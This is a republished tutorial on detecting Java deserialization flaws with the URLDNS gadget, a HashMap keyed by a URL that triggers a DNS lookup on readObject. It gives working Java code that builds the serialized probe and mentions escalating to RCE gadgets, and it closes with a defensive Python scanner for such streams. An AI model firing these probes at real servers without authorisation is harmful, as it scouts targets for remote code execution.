2025-04-05 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article explains how to detect Java deserialization vulnerabilities by triggering a DNS query through HashMap, a situation that comes up often in real engagements.
Detecting Java deserialization vulnerabilities through HashMap triggering DNS
We usually talk about deserialization vulnerabilities as being triggered in the readObject() method, but different serialization formats have different entry points; fastjson, for example, automatically invokes setter and getter methods. From there, various RMI and JNDI techniques are used to execute commands. The common black-box method for detecting Java deserialization today is to make the target execute a command, for example using a gadget to run nslookup xxx and then judging success from the DNS server's records.
One problem with this approach is that the gadget you picked may depend on a jar that the target does not have, or that has been updated, while a different vulnerable jar is present. In that case a command-execution payload built from a single gadget simply fails to report back. To address this, the idea presented here is to trigger a DNS lookup through HashMap combined with URL. In practice you can first use this to determine whether the server calls readObject() on your input and whether that code path executes at all, and only then try RCE with the various gadgets.
HashMap readObject & URLStreamHandler hashCode
HashMap first appeared in JDK 1.2 and is implemented on top of hashing. Because the slot in which an Entry is stored is computed from the hash value of its Key, and the hash value computed for the same Key may differ between JVM implementations, HashMap implements its own writeObject and readObject methods rather than relying on default serialization.
Since we're looking at deserialization, let's take a look at its readObject method.
The earlier part of readObject mainly performs consistency checks on the stream, which we can ignore. The interesting part is putVal, where the key is passed through the hash method; follow it.

    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }
The hashCode method of the key is called directly here. So what we need now is a class whose hashCode method does something interesting.
Fortunately, there is the URL class, which has a useful property: when its hashCode method runs, it delegates to the hashCode method of the current URLStreamHandler.

    public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }
Following into URLStreamHandler.hashCode(URL):

    protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        if (addr != null) {
            h += addr.hashCode();
        } else {
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        }

        // Generate the file part.
        String file = u.getFile();
        if (file != null)
            h += file.hashCode();

        // Generate the port part.
        if (u.getPort() == -1)
            h += getDefaultPort();
        else
            h += u.getPort();

        // Generate the ref part.
        String ref = u.getRef();
        if (ref != null)
            h += ref.hashCode();

        return h;
    }

The key line is:

    InetAddress addr = getHostAddress(u);

Quite simply, this is where the DNS query is finally triggered: getHostAddress resolves the host name of the URL.
So the idea is: put a URL as a key into a HashMap, serialize it, and the receiver's readObject will trigger the DNS query. One thing to note is that URL.hashCode first checks a cache: if the hashCode field is not equal to -1, it returns the cached value directly.

    if (hashCode != -1)
        return hashCode;

Because hashCode is computed when HashMap.put is executed on the generating side, the value is cached, that is, the hashCode field is no longer -1. So for the receiver to trigger the DNS query, we need to reset the hashCode field to -1 through reflection, bypassing the cache check.

    Field field = u.getClass().getDeclaredField("hashCode");
    field.setAccessible(true);
    field.set(u, -1);
The resulting code is:

    import java.io.FileOutputStream;
    import java.io.ObjectOutputStream;
    import java.lang.reflect.Field;
    import java.net.URL;
    import java.util.HashMap;

    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("object.obj"));
    String url = "https://www.xttblog.com";
    HashMap hashMap = new HashMap();   // HashMap that will contain the URL
    URL u = new URL(url);              // URL to use as the key
    // The value can be anything Serializable; the URL key is what triggers the DNS lookup.
    // Note that put() already calls u.hashCode(), so this line performs a DNS lookup
    // from the generating machine and caches the result in u.hashCode.
    hashMap.put(u, url);
    Field field = u.getClass().getDeclaredField("hashCode");
    field.setAccessible(true);
    field.set(u, -1);                  // reset the cache so the receiver recomputes hashCode on readObject
    oos.writeObject(hashMap);
    oos.flush();
    oos.close();
Test the code:
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream("object.obj"));
    ois.readObject();

Following the call stack (HashMap.readObject → putVal → hash → URL.hashCode → URLStreamHandler.hashCode → getHostAddress), you will find that the DNS query is successfully triggered.
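A defender-side check for this payload shape, as an added example that is not part of the article: a Python scanner that walks a Java serialization stream for TC_CLASSDESC records and flags a HashMap whose class descriptors also include java.net.URL. The sample byte strings are constructed by hand for the demonstration (placeholder serialVersionUIDs, abbreviated field data), not captured from a JVM.

```python
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC + STREAM_VERSION (ObjectStreamConstants)
TC_OBJECT, TC_CLASSDESC, TC_STRING = 0x73, 0x72, 0x74
# TC_CLASSDESC is followed by utf(className), long(serialVersionUID), byte(flags)
CLASS_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

def class_descriptors(stream: bytes) -> list:
    """Return the class names of every plausible TC_CLASSDESC in the stream.

    A forward scan rather than a full parser: the classes a stream would
    instantiate are enough to recognise the probe, and requiring a valid
    dotted Java identifier filters out stray 0x72 data bytes.
    """
    if not stream.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream")
    names, i = [], len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            name = stream[i + 3:i + 3 + length]
            if len(name) == length and CLASS_NAME.match(name):
                names.append(name.decode("ascii"))
                i += 3 + length + 8 + 1  # skip name, serialVersionUID, flags
                continue
        i += 1
    return names

def is_urldns_probe(stream: bytes) -> bool:
    """A java.util.HashMap whose descriptors include java.net.URL is the probe's shape."""
    names = class_descriptors(stream)
    return "java.util.HashMap" in names and "java.net.URL" in names

# --- constructed sample streams (hand-built, not captured from a JVM) ---
def utf(s: bytes) -> bytes:
    return struct.pack(">H", len(s)) + s

def classdesc(name: bytes) -> bytes:
    # placeholder serialVersionUID; flags = SC_WRITE_METHOD | SC_SERIALIZABLE
    return bytes([TC_CLASSDESC]) + utf(name) + b"\x00" * 8 + b"\x03"

SAMPLE_PROBE = (STREAM_MAGIC
                + bytes([TC_OBJECT]) + classdesc(b"java.util.HashMap")
                + bytes([TC_OBJECT]) + classdesc(b"java.net.URL")
                + bytes([TC_STRING]) + utf(b"www.example.invalid"))
SAMPLE_BENIGN = (STREAM_MAGIC + bytes([TC_OBJECT]) + classdesc(b"java.util.HashMap")
                 + bytes([TC_STRING]) + utf(b"ordinary value"))

if __name__ == "__main__":
    for label, blob in (("probe", SAMPLE_PROBE), ("benign", SAMPLE_BENIGN)):
        print(label, class_descriptors(blob), is_urldns_probe(blob))
```

In a real deployment this scan would run on the raw bytes before they ever reach ObjectInputStream; a JEP 290 deserialization filter that rejects java.net.URL is the stronger in-process control.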
© 2024 shulou.com SLNews company. All rights reserved.